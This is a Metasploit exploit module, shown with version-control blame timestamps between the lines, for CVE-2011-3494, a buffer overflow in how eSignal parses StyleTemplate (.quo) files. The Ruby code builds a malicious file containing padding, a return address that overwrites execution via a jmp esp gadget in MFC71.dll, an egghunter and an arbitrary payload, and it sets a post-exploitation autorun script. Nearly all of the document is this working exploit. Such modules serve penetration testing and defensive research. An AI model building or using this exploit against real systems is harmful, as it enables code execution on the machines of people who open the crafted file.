2013-11-15 18:19:53 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-11-15 18:19:53 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = NormalRanking
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
include Msf::Exploit::Remote::Egghunter
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2014-03-11 17:07:27 +00:00
|
|
|
'Name' => 'eSignal and eSignal Pro File Parsing Buffer Overflow in QUO',
|
2013-08-30 21:28:54 +00:00
|
|
|
'Description' => %q{
|
2014-03-11 17:07:27 +00:00
|
|
|
The software is unable to handle the "<StyleTemplate>" files (even those
|
|
|
|
original included in the program) like those with the registered
|
|
|
|
extensions QUO, SUM and POR. Successful exploitation of this
|
|
|
|
vulnerability may take up to several seconds due to the use of
|
|
|
|
egghunter. Also, DEP bypass is unlikely due to the limited space for
|
|
|
|
payload. This vulnerability affects versions 10.6.2425.1208 and earlier.
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Luigi Auriemma', # Original discovery
|
|
|
|
'TecR0c <tecr0c[at]tecninja.net>', # msf
|
|
|
|
'mr_me <steventhomasseeley[at]gmai.com>', # msf
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2011-3494' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '75456' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'BID', '49600' ],
|
|
|
|
[ 'URL', 'http://aluigi.altervista.org/adv/esignal_1-adv.txt' ],
|
|
|
|
[ 'EDB', '17837' ]
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
2017-02-23 23:04:36 +00:00
|
|
|
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1000,
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
},
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
|
|
|
'Win XP SP3 / Windows Vista / Windows 7',
|
|
|
|
{
|
|
|
|
'Ret' => 0x7c206fef, # jmp esp MFC71.dll v10.6.2425.1208
|
|
|
|
'Offset' => 54
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => 'Sep 06 2011',
|
|
|
|
'DefaultTarget' => 0))
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('FILENAME', [ false, 'The file name.', 'msf.quo']),
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
|
|
|
eggoptions =
|
|
|
|
{
|
|
|
|
:checksum => false,
|
|
|
|
:eggtag => 'eggz'
|
|
|
|
}
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
buffer = rand_text_alpha(target['Offset'])
|
|
|
|
buffer << [target.ret].pack('V')
|
|
|
|
buffer << rand_text_alpha_upper(4)
|
|
|
|
buffer << hunter
|
|
|
|
buffer << rand_text_alpha_upper(1500)
|
|
|
|
buffer << egg
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
file = "<StyleTemplate>\r\n"
|
|
|
|
file << "#{buffer}\r\n"
|
|
|
|
file << "</StyleTemplate>\r\n"
|
2011-10-15 22:58:20 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
|
|
file_create(file)
|
|
|
|
end
|
2011-10-15 22:58:20 +00:00
|
|
|
end
|